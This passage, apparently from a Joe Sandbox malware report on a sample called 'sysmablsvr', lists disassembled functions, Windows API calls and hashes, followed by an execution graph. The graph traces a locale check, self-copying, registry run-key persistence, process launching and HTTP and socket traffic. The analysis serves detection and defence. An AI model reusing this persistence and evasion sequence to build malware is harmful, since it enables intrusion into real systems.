                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Recv$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 3668019968-0
                                              • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                              • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                              Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Send$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 2121970615-0
                                              • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                              • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                              Function 0040D9A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00520634), ref: 0040D9B9
                                              • CloseHandle.KERNEL32(00520638), ref: 0040D9E8
                                              • LeaveCriticalSection.KERNEL32(00520634), ref: 0040D9F7
                                              • DeleteCriticalSection.KERNEL32(00520634), ref: 0040DA04
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                              • String ID:
                                              • API String ID: 3102160386-0
                                              • Opcode ID: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction ID: da3f5db6e059a7c592b49e611c360a1232ff957d222e4d531544d3c603d0b457
                                              • Opcode Fuzzy Hash: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction Fuzzy Hash: 2A1121B4E00208EBDB08DF94D984A9DB775FF44309F1081A9E806A7341D739EF95DB85
                                              Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                              • String ID:
                                              • API String ID: 2223660684-0
                                              • Opcode ID: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction ID: 660f416c0ba452cd5c41a421238d9990710d8623252f526507a58679470d43f9
                                              • Opcode Fuzzy Hash: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction Fuzzy Hash: 2301F27A242300AFC3209F26ED84A9B73F8AF85B11F00443EE546E3A50DB39E401CB28
                                              Function 0040DF10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040E150: memset.NTDLL ref: 0040E178
                                                • Part of subcall function 0040E150: InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                                • Part of subcall function 0040E150: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                                • Part of subcall function 0040E150: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                                • Part of subcall function 0040E150: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                                • Part of subcall function 0040E150: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                                • Part of subcall function 0040E150: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                                • Part of subcall function 0040E150: InternetCloseHandle.WININET(00000000), ref: 0040E347
                                                • Part of subcall function 0040E040: SysAllocString.OLEAUT32(00000000), ref: 0040E06E
                                                • Part of subcall function 0040E040: CoCreateInstance.OLE32(00412A18,00000000,00004401,00412A08,00000000), ref: 0040E096
                                                • Part of subcall function 0040E040: SysFreeString.OLEAUT32(00000000), ref: 0040E131
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                              • String ID: %S%S
                                              • API String ID: 1017111014-3267608656
                                              • Opcode ID: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction ID: 0d7a9dfb02ef55e8037a527aa51067439edd5703c05fc0bf7ce6e387078fb77b
                                              • Opcode Fuzzy Hash: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction Fuzzy Hash: 3E416BB5E002099FCB04DBE5C885AEFB7B4BF88304F108929E505B7391D778AA45CBA1
                                              Function 00405E50 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,?,00000000,?), ref: 00405E5F
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                              • LeaveCriticalSection.KERNEL32(004174D8), ref: 00405F30
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                              • String ID:
                                              • API String ID: 469056452-0
                                              • Opcode ID: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction ID: 40e991b6b4618cd04087b2a5cfa683f62b0bf83616b4f0bda180c9645beb9567
                                              • Opcode Fuzzy Hash: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction Fuzzy Hash: C2218B70904208ABCB04DB94D885BDEBBB5EB94304F1481BAE845672C1C77CAA85CB9A

                                              Execution Graph

                                              Execution Coverage:0.1%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:1476
                                              Total number of Limit Nodes:1
                                              execution_graph 4380 407500 Sleep CreateMutexA GetLastError 4381 407536 ExitProcess 4380->4381 4382 40753e 6 API calls 4380->4382 4383 4075e3 4382->4383 4384 4078a9 Sleep RegOpenKeyExW 4382->4384 4466 40ecc0 GetLocaleInfoA strcmp 4383->4466 4386 407902 RegOpenKeyExW 4384->4386 4387 4078d6 RegSetValueExA RegCloseKey 4384->4387 4389 407950 RegOpenKeyExW 4386->4389 4390 407924 RegSetValueExA RegCloseKey 4386->4390 4387->4386 4393 407972 RegSetValueExA RegCloseKey 4389->4393 4394 40799e RegOpenKeyExW 4389->4394 4390->4389 4391 4075f0 ExitProcess 4392 4075f8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4395 40764c SetFileAttributesW RegOpenKeyExW 4392->4395 4396 4076de Sleep wsprintfW CopyFileW 4392->4396 4393->4394 4397 4079c0 RegSetValueExA RegCloseKey 4394->4397 4398 4079ec RegOpenKeyExW 4394->4398 4395->4396 4401 40767d wcslen RegSetValueExW 4395->4401 4402 407726 SetFileAttributesW RegOpenKeyExW 4396->4402 4403 4077b8 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4396->4403 4397->4398 4399 407a0e RegSetValueExA RegCloseKey 4398->4399 4400 407a3f RegOpenKeyExW 4398->4400 4404 407ae4 RegOpenKeyExW 4399->4404 4406 407a61 RegCreateKeyExW RegCloseKey 4400->4406 4407 407a96 RegOpenKeyExW 4400->4407 4401->4396 4408 4076b2 RegCloseKey 4401->4408 4402->4403 4409 407757 wcslen RegSetValueExW 4402->4409 4403->4384 4405 407817 SetFileAttributesW RegOpenKeyExW 4403->4405 4412 407b06 RegSetValueExA RegCloseKey 4404->4412 4413 407b37 RegOpenKeyExW 4404->4413 4405->4384 4410 407848 wcslen RegSetValueExW 4405->4410 4406->4407 4407->4404 4411 407ab8 RegSetValueExA RegCloseKey 4407->4411 4468 40ef10 memset memset CreateProcessW 4408->4468 4409->4403 4415 40778c RegCloseKey 4409->4415 4410->4384 4416 40787d RegCloseKey 4410->4416 4411->4404 4417 407c33 RegOpenKeyExW 4412->4417 4419 407b59 RegCreateKeyExW RegCloseKey 4413->4419 4420 407b8e RegOpenKeyExW 4413->4420 4421 40ef10 6 API calls 4415->4421 4422 40ef10 6 API calls 4416->4422 4426 407c81 RegOpenKeyExW 4417->4426 4427 407c55 RegSetValueExA RegCloseKey 4417->4427 4419->4420 4424 407bb0 RegCreateKeyExW RegCloseKey 4420->4424 4425 407be5 RegOpenKeyExW 4420->4425 4428 4077a5 4421->4428 4432 407896 4422->4432 4423 4076d6 ExitProcess 4424->4425 4425->4417 4433 407c07 RegSetValueExA RegCloseKey 4425->4433 4430 407ca3 RegSetValueExA RegCloseKey 4426->4430 4431 407ccf RegOpenKeyExA 4426->4431 4427->4426 4428->4403 4429 4077b0 ExitProcess 4428->4429 4430->4431 4434 407cf5 8 API calls 4431->4434 4435 407ddb RegOpenKeyExA 4431->4435 4432->4384 4436 4078a1 ExitProcess 4432->4436 4433->4417 4434->4435 4437 407e01 8 API calls 4435->4437 4438 407ee7 Sleep 4435->4438 4437->4438 4473 40cd60 4438->4473 4441 407f02 9 API calls 4476 405b60 InitializeCriticalSection CreateFileW 4441->4476 5301 4073b0 4441->5301 5308 405820 4441->5308 5317 406b50 Sleep GetModuleFileNameW 4441->5317 4443 40806e 4448 407fb7 CreateEventA 4508 40c490 4448->4508 4457 40d6f0 17 API calls 4458 408017 4457->4458 4459 40d6f0 17 API calls 4458->4459 4460 408033 4459->4460 4461 40d6f0 17 API calls 4460->4461 4462 40804f 4461->4462 4553 40d860 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4462->4553 4464 40805f 4562 40d9a0 4464->4562 4467 4075e8 4466->4467 4467->4391 4467->4392 4469 40ef81 ShellExecuteW 4468->4469 4470 40ef72 Sleep 4468->4470 4471 4076cb 4469->4471 4472 40efa7 Sleep 4469->4472 4470->4471 4471->4396 4471->4423 4472->4471 4571 40cd30 4473->4571 4477 405c85 4476->4477 4478 405b98 CreateFileMappingW 4476->4478 4490 40dbd0 CoInitializeEx 4477->4490 4479 405bb9 MapViewOfFile 4478->4479 4480 405c7b CloseHandle 4478->4480 4481 405c71 CloseHandle 4479->4481 4482 405bd8 GetFileSize 4479->4482 4480->4477 4481->4480 4486 405bed 4482->4486 4483 405c67 UnmapViewOfFile 4483->4481 4485 405bfc 4485->4483 4486->4483 4486->4485 4487 405c2c 4486->4487 4700 40cdb0 4486->4700 4707 405c90 4486->4707 4488 40a740 _invalid_parameter 3 API calls 4487->4488 4488->4485 5015 40dca0 socket 4490->5015 4492 40dbf0 4493 407fb2 4492->4493 4496 40dc3a 4492->4496 4502 40dc78 4492->4502 5025 40df10 4492->5025 4503 406f70 CoInitializeEx SysAllocString 4493->4503 5040 40b010 htons 4496->5040 4501 40ea00 24 API calls 4501->4502 5059 40a860 4502->5059 4504 406f92 4503->4504 4505 406fa8 CoUninitialize 4503->4505 5204 406fc0 4504->5204 4505->4448 5213 40c450 4508->5213 4511 40c450 3 API calls 4512 40c4ae 4511->4512 4513 40c450 3 API calls 4512->4513 4514 40c4be 4513->4514 4515 40c450 3 API calls 4514->4515 4516 407fcf 4515->4516 4517 40d6c0 4516->4517 4518 40a320 7 API calls 4517->4518 4519 40d6cb 4518->4519 4520 407fd9 4519->4520 4521 40d6d7 InitializeCriticalSection 4519->4521 4522 40b850 InitializeCriticalSection 4520->4522 4521->4520 4535 40b86a 4522->4535 4523 40b899 CreateFileW 4525 40b8c0 CreateFileMappingW 4523->4525 4526 40b982 4523->4526 4528 40b8e1 MapViewOfFile 4525->4528 4529 40b978 CloseHandle 4525->4529 5269 40b0f0 EnterCriticalSection 4526->5269 4532 40b8fc GetFileSize 4528->4532 4533 40b96e CloseHandle 4528->4533 4529->4526 4531 40b987 4534 40d6f0 17 API calls 4531->4534 4539 40b91b 4532->4539 4533->4529 4536 407fe3 4534->4536 4535->4523 5220 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 4535->5220 5221 40b430 4535->5221 4541 40d6f0 4536->4541 4537 40b964 UnmapViewOfFile 4537->4533 4539->4537 4540 40b430 32 API calls 4539->4540 5268 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 4539->5268 4540->4539 4542 40d707 EnterCriticalSection 4541->4542 4543 407ffc 4541->4543 5296 40d7e0 4542->5296 4543->4457 4546 40d7cb LeaveCriticalSection 4546->4543 4547 40a570 9 API calls 4548 40d749 4547->4548 4548->4546 4549 40d75b CreateThread 4548->4549 4549->4546 4550 40d77e 4549->4550 4551 40d7a2 GetCurrentProcess GetCurrentProcess DuplicateHandle 4550->4551 4552 40d7c4 4550->4552 4551->4552 4552->4546 4554 40d896 InterlockedExchangeAdd 4553->4554 4555 40d979 GetCurrentThread SetThreadPriority 4553->4555 4554->4555 4561 40d8b0 4554->4561 4555->4464 4556 40d8c9 EnterCriticalSection 4556->4561 4557 40d937 LeaveCriticalSection 4559 40d94e 4557->4559 4557->4561 4558 40d913 WaitForSingleObject 4558->4561 4559->4555 4560 40d96c Sleep 4560->4561 4561->4555 4561->4556 4561->4557 4561->4558 4561->4559 4561->4560 4563 40da22 4562->4563 4564 40d9ac EnterCriticalSection 4562->4564 4563->4443 4565 40d9c8 4564->4565 4566 40d9f0 LeaveCriticalSection DeleteCriticalSection 4565->4566 4567 40d9db CloseHandle 4565->4567 4568 40a740 _invalid_parameter 3 API calls 4566->4568 4567->4565 4569 40da16 4568->4569 4570 40a740 _invalid_parameter 3 API calls 4569->4570 4570->4563 4574 40c980 4571->4574 4575 40c9b3 4574->4575 4576 40c99e 4574->4576 4578 407ef7 4575->4578 4606 40cb60 4575->4606 4580 40c9e0 4576->4580 4578->4441 4578->4443 4581 40ca09 4580->4581 4583 40ca92 4580->4583 4582 40ca8a 4581->4582 4640 40a320 4581->4640 4582->4578 4583->4582 4585 40a320 7 API calls 4583->4585 4587 40cab8 4585->4587 4587->4582 4589 402420 7 API calls 4587->4589 4591 40cae5 4589->4591 4593 4024e0 10 API calls 4591->4593 4595 40caff 4593->4595 4594 40ca5f 4596 402420 7 API calls 4594->4596 4597 402420 7 API calls 4595->4597 4598 40ca70 4596->4598 4599 40cb10 4597->4599 4600 4024e0 10 API calls 4598->4600 4601 4024e0 10 API calls 4599->4601 4600->4582 4602 40cb2a 4601->4602 4603 402420 7 API calls 4602->4603 4604 40cb3b 4603->4604 4605 4024e0 10 API calls 4604->4605 4605->4582 4607 40cb89 4606->4607 4608 40cc3a 4606->4608 4609 40a320 7 API calls 4607->4609 4639 40cc32 4607->4639 4610 40a320 7 API calls 4608->4610 4608->4639 4611 40cb9f 4609->4611 4613 40cc5e 4610->4613 4612 402420 7 API calls 4611->4612 4611->4639 4614 40cbc3 4612->4614 4615 402420 7 API calls 4613->4615 4613->4639 4616 40a320 7 API calls 4614->4616 4617 40cc82 4615->4617 4618 40cbd2 4616->4618 4619 40a320 7 API calls 4617->4619 4620 4024e0 10 API calls 4618->4620 4621 40cc91 4619->4621 4622 40cbfb 4620->4622 4623 4024e0 10 API calls 4621->4623 4624 40a740 _invalid_parameter 3 API calls 4622->4624 4625 40ccba 4623->4625 4626 40cc07 4624->4626 4627 40a740 _invalid_parameter 3 API calls 4625->4627 4628 402420 7 API calls 4626->4628 4629 40ccc6 4627->4629 4630 40cc18 4628->4630 4631 402420 7 API calls 4629->4631 4632 4024e0 10 API calls 4630->4632 4633 40ccd7 4631->4633 4632->4639 4634 4024e0 10 API calls 4633->4634 4635 40ccf1 4634->4635 4636 402420 7 API calls 4635->4636 4637 40cd02 4636->4637 4638 4024e0 10 API calls 4637->4638 4638->4639 4639->4578 4651 40a340 4640->4651 4643 402420 4672 40a530 4643->4672 4648 4024e0 4679 402540 4648->4679 4650 4024ff _invalid_parameter 4650->4594 4660 40a3e0 GetCurrentProcessId 4651->4660 4653 40a34b 4656 40a357 _invalid_parameter 4653->4656 4661 40a400 4653->4661 4655 40a32e 4655->4582 4655->4643 4656->4655 4657 40a372 HeapAlloc 4656->4657 4657->4655 4658 40a399 _invalid_parameter 4657->4658 4658->4655 4659 40a3b4 memset 4658->4659 4659->4655 4660->4653 4669 40a3e0 GetCurrentProcessId 4661->4669 4663 40a409 4664 40a426 HeapCreate 4663->4664 4670 40a470 GetProcessHeaps 4663->4670 4666 40a440 HeapSetInformation GetCurrentProcessId 4664->4666 4667 40a467 4664->4667 4666->4667 4667->4656 4669->4663 4671 40a41c 4670->4671 4671->4664 4671->4667 4673 40a340 _invalid_parameter 7 API calls 4672->4673 4674 40242b 4673->4674 4675 402820 4674->4675 4676 40282a 4675->4676 4677 40a530 _invalid_parameter 7 API calls 4676->4677 4678 402438 4677->4678 4678->4648 4680 40258e 4679->4680 4681 402551 4679->4681 4680->4681 4682 40a530 _invalid_parameter 7 API calls 4680->4682 4681->4650 4685 4025b2 _invalid_parameter 4682->4685 4683 4025e2 memcpy 4684 402606 _invalid_parameter 4683->4684 4686 40a740 _invalid_parameter 3 API calls 4684->4686 4685->4683 4689 40a740 4685->4689 4686->4681 4696 40a3e0 GetCurrentProcessId 4689->4696 4691 40a74b 4692 4025df 4691->4692 4697 40a680 4691->4697 4692->4683 4695 40a767 HeapFree 4695->4692 4696->4691 4698 40a6b0 HeapValidate 4697->4698 4699 40a6d0 4697->4699 4698->4699 4699->4692 4699->4695 4717 40a7b0 4700->4717 4703 40cdf1 4703->4486 4706 40a740 _invalid_parameter 3 API calls 4706->4703 4930 40a570 4707->4930 4710 405cca memcpy 4712 40a7b0 8 API calls 4710->4712 4711 405d88 4711->4486 4713 405d01 4712->4713 4940 40c720 4713->4940 4718 40a7dd 4717->4718 4719 40a530 _invalid_parameter 7 API calls 4718->4719 4720 40a7f2 4718->4720 4721 40a7f4 memcpy 4718->4721 4719->4718 4720->4703 4722 40c2c0 4720->4722 4721->4718 4730 40c2ca 4722->4730 4724 40c2e9 4724->4703 4724->4706 4726 40c301 memcmp 4726->4730 4727 40c328 4729 40a740 _invalid_parameter 3 API calls 4727->4729 4728 40a740 _invalid_parameter 3 API calls 4728->4730 4729->4724 4730->4724 4730->4726 4730->4727 4730->4728 4731 40c7b0 4730->4731 4745 408080 4730->4745 4732 40c7bf _invalid_parameter 4731->4732 4733 40a530 _invalid_parameter 7 API calls 4732->4733 4744 40c7c9 4732->4744 4734 40c858 4733->4734 4735 402420 7 API calls 4734->4735 4734->4744 4736 40c86d 4735->4736 4737 402420 7 API calls 4736->4737 4738 40c875 4737->4738 4740 40c8cd _invalid_parameter 4738->4740 4748 40c920 4738->4748 4753 402470 4740->4753 4743 402470 3 API calls 4743->4744 4744->4730 4861 40a2a0 4745->4861 4749 4024e0 10 API calls 4748->4749 4750 40c934 4749->4750 4759 4026f0 4750->4759 4752 40c94c 4752->4738 4754 4024ce 4753->4754 4756 402484 _invalid_parameter 4753->4756 4754->4743 4755 40a740 _invalid_parameter 3 API calls 4755->4754 4757 40a740 _invalid_parameter 3 API calls 4756->4757 4758 4024ac 4756->4758 4757->4758 4758->4755 4762 402710 4759->4762 4761 40270a 4761->4752 4763 402724 4762->4763 4764 402540 __aligned_recalloc_base 10 API calls 4763->4764 4765 40276d 4764->4765 4766 402540 __aligned_recalloc_base 10 API calls 4765->4766 4767 40277d 4766->4767 4768 402540 __aligned_recalloc_base 10 API calls 4767->4768 4769 40278d 4768->4769 4770 402540 __aligned_recalloc_base 10 API calls 4769->4770 4771 40279d 4770->4771 4772 4027a6 4771->4772 4773 4027cf 4771->4773 4777 403e20 4772->4777 4794 403df0 4773->4794 4776 4027c7 _invalid_parameter 4776->4761 4778 402820 _invalid_parameter 7 API calls 4777->4778 4779 403e37 4778->4779 4780 402820 _invalid_parameter 7 API calls 4779->4780 4781 403e46 4780->4781 4782 402820 _invalid_parameter 7 API calls 4781->4782 4783 403e55 4782->4783 4784 402820 _invalid_parameter 7 API calls 4783->4784 4793 403e64 _invalid_parameter 4784->4793 4786 40400f _invalid_parameter 4787 402850 _invalid_parameter 3 API calls 4786->4787 4788 404035 _invalid_parameter 4786->4788 4787->4786 4789 402850 _invalid_parameter 3 API calls 4788->4789 4790 40405b _invalid_parameter 4788->4790 4789->4788 4791 402850 _invalid_parameter 3 API calls 4790->4791 4792 404081 4790->4792 4791->4790 4792->4776 4793->4786 4797 402850 4793->4797 4801 404090 4794->4801 4796 403e0c 4796->4776 4798 40285b 4797->4798 4800 402866 4797->4800 4799 40a740 _invalid_parameter 3 API calls 4798->4799 4799->4800 4800->4793 4802 4040a6 _invalid_parameter 4801->4802 4803 4040b8 _invalid_parameter 4802->4803 4804 4040dd 4802->4804 4806 404103 4802->4806 4803->4796 4831 403ca0 4804->4831 4807 40413d 4806->4807 4808 40415e 4806->4808 4841 404680 4807->4841 4810 402820 _invalid_parameter 7 API calls 4808->4810 4811 40416f 4810->4811 4812 402820 _invalid_parameter 7 API calls 4811->4812 4813 40417e 4812->4813 4814 402820 _invalid_parameter 7 API calls 4813->4814 4815 40418d 4814->4815 4816 402820 _invalid_parameter 7 API calls 4815->4816 4817 40419c 4816->4817 4854 403d70 4817->4854 4819 402820 _invalid_parameter 7 API calls 4820 4041ca _invalid_parameter 4819->4820 4820->4819 4822 404284 _invalid_parameter 4820->4822 4821 402850 _invalid_parameter 3 API calls 4821->4822 4822->4821 4823 4045a3 _invalid_parameter 4822->4823 4824 402850 _invalid_parameter 3 API calls 4823->4824 4825 4045c9 _invalid_parameter 4823->4825 4824->4823 4826 402850 _invalid_parameter 3 API calls 4825->4826 4827 4045ef _invalid_parameter 4825->4827 4826->4825 4828 402850 _invalid_parameter 3 API calls 4827->4828 4829 404615 _invalid_parameter 4827->4829 4828->4827 4829->4803 4830 402850 _invalid_parameter 3 API calls 4829->4830 4830->4829 4832 403cae 4831->4832 4833 402820 _invalid_parameter 7 API calls 4832->4833 4834 403ccb 4833->4834 4835 402820 _invalid_parameter 7 API calls 4834->4835 4837 403cda _invalid_parameter 4835->4837 4836 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4836->4837 4837->4836 4838 403d3a _invalid_parameter 4837->4838 4839 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4838->4839 4840 403d60 4838->4840 4839->4838 4840->4803 4842 402820 _invalid_parameter 7 API calls 4841->4842 4843 404697 4842->4843 4844 402820 _invalid_parameter 7 API calls 4843->4844 4845 4046a6 4844->4845 4846 402820 _invalid_parameter 7 API calls 4845->4846 4853 4046b5 _invalid_parameter 4846->4853 4847 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4847->4853 4848 404841 _invalid_parameter 4849 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4848->4849 4850 404867 _invalid_parameter 4848->4850 4849->4848 4851 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4850->4851 4852 40488d 4850->4852 4851->4850 4852->4803 4853->4847 4853->4848 4855 402820 _invalid_parameter 7 API calls 4854->4855 4856 403d7f _invalid_parameter 4855->4856 4857 403ca0 _invalid_parameter 9 API calls 4856->4857 4859 403db8 _invalid_parameter 4857->4859 4858 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4858->4859 4859->4858 4860 403de3 4859->4860 4860->4820 4862 40a2b2 4861->4862 4865 40a200 4862->4865 4866 40a530 _invalid_parameter 7 API calls 4865->4866 4873 40a210 4866->4873 4869 40a740 _invalid_parameter 3 API calls 4871 40809f 4869->4871 4870 40a24c 4870->4869 4871->4730 4873->4870 4873->4871 4874 409730 4873->4874 4881 409d20 4873->4881 4886 40a0f0 4873->4886 4875 409739 4874->4875 4876 409743 4874->4876 4875->4873 4876->4875 4877 409786 memset 4876->4877 4877->4875 4878 4097a7 4877->4878 4878->4875 4879 4097ad memcpy 4878->4879 4894 409500 4879->4894 4882 409d37 4881->4882 4885 409d2d 4881->4885 4883 409e2f memcpy 4882->4883 4882->4885 4899 409a50 4882->4899 4883->4882 4885->4873 4888 40a106 4886->4888 4892 40a0fc 4886->4892 4887 409a50 64 API calls 4889 40a187 4887->4889 4888->4887 4888->4892 4890 409500 6 API calls 4889->4890 4889->4892 4891 40a1a6 4890->4891 4891->4892 4893 40a1bb memcpy 4891->4893 4892->4873 4893->4892 4895 40954e 4894->4895 4897 40950e 4894->4897 4895->4875 4897->4895 4898 409440 6 API calls 4897->4898 4898->4897 4901 409a6a 4899->4901 4903 409a60 4899->4903 4901->4903 4909 409890 4901->4909 4903->4882 4904 409ba8 memcpy 4904->4903 4906 409bc7 memcpy 